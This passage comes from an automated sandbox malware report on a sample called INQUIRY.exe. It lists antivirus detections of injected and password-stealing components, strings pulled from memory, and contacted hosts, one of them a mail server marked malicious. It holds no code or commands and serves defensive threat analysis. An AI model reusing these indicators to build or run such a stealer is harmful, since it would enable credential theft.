                    32.2.INQUIRY.exe.2630000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.7a0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    16.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    32.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    27.2.INQUIRY.exe.25e0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.2240000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.2240000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    1.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.iigcest.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.jiyu-kobo.co.jp/://w0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/typo0%Avira URL Cloudsafe
                    http://www.fontbureau.comsiv&0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/Treb0%Avira URL Cloudsafe
                    http://www.carterandcone.comandh0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp//0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comepko0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/s/0%Avira URL Cloudsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0p0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/cheV0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/=0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.carterandcone.comTCE0%Avira URL Cloudsafe
                    http://www.carterandcone.comits0%Avira URL Cloudsafe
                    http://www.carterandcone.comMic0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.carterandcone.comTC(0%Avira URL Cloudsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.comTTFF0%Avira URL Cloudsafe
                    http://www.fontbureau.com=0%Avira URL Cloudsafe
                    http://www.carterandcone.comtig0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.fontbureau.comnc.0%Avira URL Cloudsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://go.microsoft.0%Avira URL Cloudsafe
                    http://go.microsoft.LinkId=421270%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://www.carterandcone.comn0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.comle0%Avira URL Cloudsafe
                    http://www.fontbureau.comk0%Avira URL Cloudsafe
                    http://www.fontbureau.comm=0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.fontbureau.comlvfet0%Avira URL Cloudsafe
                    http://www.fontbureau.coms0%Avira URL Cloudsafe
                    http://www.carterandcone.com$p0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    whatismyipaddress.com
                    		104.16.154.36
                    		truefalse
                      		high
                      mail.iigcest.com
                      		166.62.27.57
                      		truetrueunknown
                      121.205.6.0.in-addr.arpa
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://whatismyipaddress.com/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.jiyu-kobo.co.jp/://wINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designersGINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/typoINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comsiv&INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://www.jiyu-kobo.co.jp/TrebINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comandhINQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/jp//INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comINQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersINQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comepkoINQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/s/INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comessedINQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.krINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comINQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.com0pINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/cheVINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designerslbINQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/jp/=INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sajatypeworks.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comTCEINQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.carterandcone.comitsINQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.carterandcone.comMicINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designersdINQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpfalse
                                      		high
                                      http://whatismyipaddress.com/-INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleaseINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.comgritoINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://login.yahoo.com/config/loginINQUIRY.exe, vbc.exefalse
                                          		high
                                          http://www.fonts.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.site.com/logs.phpINQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.urwpp.deDPleaseINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.nirsoft.net/vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpfalse
                                                		high
                                                http://www.zhongyicts.com.cnINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comTC(INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.carterandcone.como.INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comTTFFINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com=INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.carterandcone.comtigINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://whatismyipaddress.com/INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.comnc.INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://whatismyipaddress.comINQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/cabarga.htmluINQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.carterandcone.comTCINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://go.microsoft.INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://whatismyipaddress.comINQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://go.microsoft.LinkId=42127INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            http://www.jiyu-kobo.co.jp/jp/INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://en.wINQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comnINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carterandcone.comlINQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comleINQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.comkINQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.comm=INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.founder.com.cn/cnINQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/sINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlINQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.comlvfetINQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.fontbureau.comsINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.carterandcone.com$pINQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  http://www.fontbureau.com/designershqINQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers8INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.comalsd=INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      http://www.tiro.comicINQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.jiyu-kobo.co.jp/_INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.carterandcone.comsmINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.16.154.36
                                                                      		unknownUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      104.16.155.36
                                                                      		unknownUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      166.62.27.57
                                                                      		unknownUnited States
                                                                      		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                      Analysis ID:319686
                                                                      Start date:18.11.2020
                                                                      Start time:15:00:58
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 14m 29s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:INQUIRY.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:40
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 82% (good quality ratio 80.2%)
                                                                      • Quality average: 85.6%
                                                                      • Quality standard deviation: 23.6%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 51.104.144.132, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 52.147.198.201, 92.122.213.247, 92.122.213.194, 51.104.139.180, 13.64.90.137
                                                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      15:01:59API Interceptor70x Sleep call for process: INQUIRY.exe modified
                                                                      15:02:07API Interceptor4x Sleep call for process: dw20.exe modified
